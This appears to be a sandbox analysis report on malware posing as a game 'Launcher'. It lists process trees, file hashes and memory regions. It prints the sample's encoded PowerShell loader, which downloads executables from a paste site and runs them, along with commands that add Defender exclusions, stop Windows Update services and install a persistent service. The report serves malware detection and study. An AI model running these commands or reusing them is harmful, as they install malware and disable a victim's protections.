PID 1732 wrote to memory of 3984	1732	powershell.exe	axfu4rpx.rry0.exe
PID 1732 wrote to memory of 3984	1732	powershell.exe	axfu4rpx.rry0.exe
PID 1732 wrote to memory of 3984	1732	powershell.exe	axfu4rpx.rry0.exe
PID 1732 wrote to memory of 4872	1732	powershell.exe	axfu4rpx.rry1.exe
PID 1732 wrote to memory of 4872	1732	powershell.exe	axfu4rpx.rry1.exe
PID 1732 wrote to memory of 1568	1732	powershell.exe	axfu4rpx.rry2.exe
PID 1732 wrote to memory of 1568	1732	powershell.exe	axfu4rpx.rry2.exe
PID 1732 wrote to memory of 1568	1732	powershell.exe	axfu4rpx.rry2.exe
PID 1568 wrote to memory of 864	1568	axfu4rpx.rry2.exe	cmd.exe
PID 1568 wrote to memory of 864	1568	axfu4rpx.rry2.exe	cmd.exe
PID 864 wrote to memory of 4396	864	cmd.exe	where.exe
PID 864 wrote to memory of 4396	864	cmd.exe	where.exe
PID 864 wrote to memory of 4936	864	cmd.exe	powershell.exe
PID 864 wrote to memory of 4936	864	cmd.exe	powershell.exe
PID 3984 wrote to memory of 464	3984	axfu4rpx.rry0.exe	openwith.exe
PID 3984 wrote to memory of 464	3984	axfu4rpx.rry0.exe	openwith.exe
PID 3984 wrote to memory of 464	3984	axfu4rpx.rry0.exe	openwith.exe
PID 3984 wrote to memory of 464	3984	axfu4rpx.rry0.exe	openwith.exe
PID 3984 wrote to memory of 464	3984	axfu4rpx.rry0.exe	openwith.exe
PID 876 wrote to memory of 4836	876	cmd.exe	wusa.exe
PID 876 wrote to memory of 4836	876	cmd.exe	wusa.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 4872 wrote to memory of 1016	4872	axfu4rpx.rry1.exe	dialer.exe
PID 1016 wrote to memory of 616	1016	dialer.exe	winlogon.exe
PID 1016 wrote to memory of 672	1016	dialer.exe	lsass.exe
PID 1016 wrote to memory of 960	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 380	1016	dialer.exe	dwm.exe
PID 1016 wrote to memory of 408	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1028	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1124	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1136	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1160	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1168	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1292	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1308	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1320	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1364	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1496	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1540	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1552	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1628	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1708	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1752	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1760	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1852	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1956	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1964	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1440	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 1436	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2092	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2112	1016	dialer.exe	spoolsv.exe
PID 1016 wrote to memory of 2216	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2332	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2496	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2504	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2680	1016	dialer.exe	svchost.exe
PID 1016 wrote to memory of 2692	1016	dialer.exe	sysmon.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:380

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1168

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1496

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2512

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1552

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2092

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2112

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2680

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2780

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3264

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3420

C:\Users\Admin\AppData\Local\Temp\RedEngine\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\RedEngine\Launcher.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732

C:\Users\Admin\AppData\Roaming\axfu4rpx.rry0.exe
"C:\Users\Admin\AppData\Roaming\axfu4rpx.rry0.exe"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3984

C:\Users\Admin\AppData\Roaming\axfu4rpx.rry1.exe
"C:\Users\Admin\AppData\Roaming\axfu4rpx.rry1.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4872

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:4836

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:4644

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1888

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:5096

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:4092

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:2920

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4008

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "AAWUFTXN"
5⤵
- Launches sc.exe
PID:3320

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
5⤵
- Launches sc.exe
PID:4888

C:\Users\Admin\AppData\Roaming\axfu4rpx.rry2.exe
"C:\Users\Admin\AppData\Roaming\axfu4rpx.rry2.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5C87.tmp\5C88.tmp\5C89.bat C:\Users\Admin\AppData\Roaming\axfu4rpx.rry2.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3788

C:\Windows\system32\where.exe
where node
6⤵
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3568

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3776

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3924

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3440

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4456

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3580

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4968

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1600

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:2364

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:972

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2672

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4412

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:4448

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2972

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4056

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:2272

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4228

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
806286a9ea8981d782ba5872780e6a4c

SHA1
99fe6f0c1098145a7b60fda68af7e10880f145da

SHA256
cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

SHA512
362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
Filesize
8KB

MD5
4433cdbe02aebd3a210f19a69d0867c6

SHA1
fe63ad6b10a04c8fae33cefd1aaddb856766a25d

SHA256
6b79baaa0174b4e98eacb586d2b09a06fb0210cfd0dddd6d7e3946e939d5a0e8

SHA512
396dfae87796aede2569a33e866870cc4953edaae6322604e93dc9ae99bc56e64ab002cb471818329ff27059bd72d5e24b0f9840875ded4b2dde4ec45a12e64e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize
328B

MD5
06f5bb4d37a5adf0b76d888c36d940cc

SHA1
c517101a35e220f3267cf2a877ed6f5928862c53

SHA256
12b5bb06e437f8b26f958d085c3aa15254fca0db1b912ca30b11eeedbdca287e

SHA512
18a4ff2e5adfaa668848f99a2d35a38295b963035aca3f59db3de1d2986129125e683b51e0d72e4f8f2fd72cfd5ac1cfeda1ef4aa8119c028727c5668d5675a4

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize
330B

MD5
5e62a03dcea137eab62a68fcb3724f2f

SHA1
39b1ef5521103cf00c84388e6b93a306bd72ac45

SHA256
fe96ef74a5271b32cb7ec5eac6141e10ad8328b53119cfaecd0149cccd012dd2

SHA512
bc166fc67b42118103b82075f2263cc6cbdba510a71a39474a6d6d37f283633164d5f5d51be3cd76204c9541d8b28778cafe7ac7cde5e6240dc92059569ca73d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5C87.tmp\5C88.tmp\5C89.bat
Filesize
1KB

MD5
271dec7719a77c4638942d8247d12033

SHA1
e06d0309acc948f47bd1d2c4ced15a165875e4b6

SHA256
33cd4ccab998f90c97b237fec669e31944906c70298187e506934877aa0605bd

SHA512
3b352583360edbd980ac6885e0fdf431231fc39f8da0553b0457914fb1a2276bf508e3a33dc629857e5d47acb20fcddadee1120b99eaadb761443e6ae7b27226

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_to1mzzxh.qar.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\axfu4rpx.rry0.exe
Filesize
423KB

MD5
8b1de71f412ebe150a2054bddc0ddcc8

SHA1
4782e5487b98bc353959dca110000328ba596c30

SHA256
c1680857ca2993539b1cf3040f144cd26e324c0091ef7e4e500a390584c98b66

SHA512
d725798c7677b54dc5fb1662ba98a71a50bdbcdf101b06cd560a90211be7ae9ebed315f2ceec8a38425c9de63ca53b4dc541b53d432deb17bafb1d102949c57b

Download Submit
C:\Users\Admin\AppData\Roaming\axfu4rpx.rry1.exe
Filesize
5.2MB

MD5
d3a0a9f2a3e80ac0b21989c1d5122944

SHA1
d329ff5a234047c101b5a17f6bc5fc8b796d0aa7

SHA256
cbf66a9ab4d8749f32b89d73d0bc5ffd56edf8b59e608270bd5c3f08764babe0

SHA512
40e651126f7d26442450e0069db1a55f9ad93df70c124ff6c900df61a762fd0e6b6c64e7196bd61b2c7d951996f8dd2e12c11f4151df8ccb03bbe21dbc30d2bf

Download Submit
C:\Users\Admin\AppData\Roaming\axfu4rpx.rry2.exe
Filesize
89KB

MD5
232df1e89fad603c20a9dced57983322

SHA1
89347e16c723e4cc89a080066a632b9f48a26cb3

SHA256
3b5ea4dddab91d998e105206b8cffade1554b065b88e584360710b11a315bfd0

SHA512
1adc8603c0757daa7076fe2f6af7b88369841107c9cc964083e8e1fa90adff2b32f87278df48f53591161ce6507c9434a3426b6ec4532020d605495e1f9d2e5a

Download Submit
memory/380-111-0x00007FF8B8470000-0x00007FF8B8480000-memory.dmp

Filesize
64KB

Download
memory/380-110-0x000001BC059B0000-0x000001BC059DB000-memory.dmp

Filesize
172KB

Download
memory/408-117-0x00007FF8B8470000-0x00007FF8B8480000-memory.dmp

Filesize
64KB

Download
memory/408-116-0x000001C9815D0000-0x000001C9815FB000-memory.dmp

Filesize
172KB

Download
memory/464-70-0x0000000000460000-0x0000000000469000-memory.dmp

Filesize
36KB

Download
memory/464-76-0x0000000075980000-0x0000000075B95000-memory.dmp

Filesize
2.1MB

Download
memory/464-73-0x0000000001F30000-0x0000000002330000-memory.dmp

Filesize
4.0MB

Download
memory/464-74-0x00007FF8F83F0000-0x00007FF8F85E5000-memory.dmp

Filesize
2.0MB

Download
memory/616-102-0x0000024A6E340000-0x0000024A6E36B000-memory.dmp

Filesize
172KB

Download
memory/616-104-0x00007FF8B8470000-0x00007FF8B8480000-memory.dmp

Filesize
64KB

Download
memory/616-99-0x0000024A6E310000-0x0000024A6E334000-memory.dmp

Filesize
144KB

Download
memory/672-103-0x00007FF8B8470000-0x00007FF8B8480000-memory.dmp

Filesize
64KB

Download
memory/672-101-0x0000017F43200000-0x0000017F4322B000-memory.dmp

Filesize
172KB

Download
memory/960-113-0x0000026FDF2D0000-0x0000026FDF2FB000-memory.dmp

Filesize
172KB

Download
memory/960-114-0x00007FF8B8470000-0x00007FF8B8480000-memory.dmp

Filesize
64KB

Download
memory/1008-1-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

Filesize
8KB

Download
memory/1008-0-0x00000000008B0000-0x00000000008B8000-memory.dmp

Filesize
32KB

Download
memory/1016-94-0x00007FF8F76E0000-0x00007FF8F779E000-memory.dmp

Filesize
760KB

Download
memory/1016-88-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1016-92-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1016-89-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1016-93-0x00007FF8F83F0000-0x00007FF8F85E5000-memory.dmp

Filesize
2.0MB

Download
memory/1016-87-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1016-96-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1016-90-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
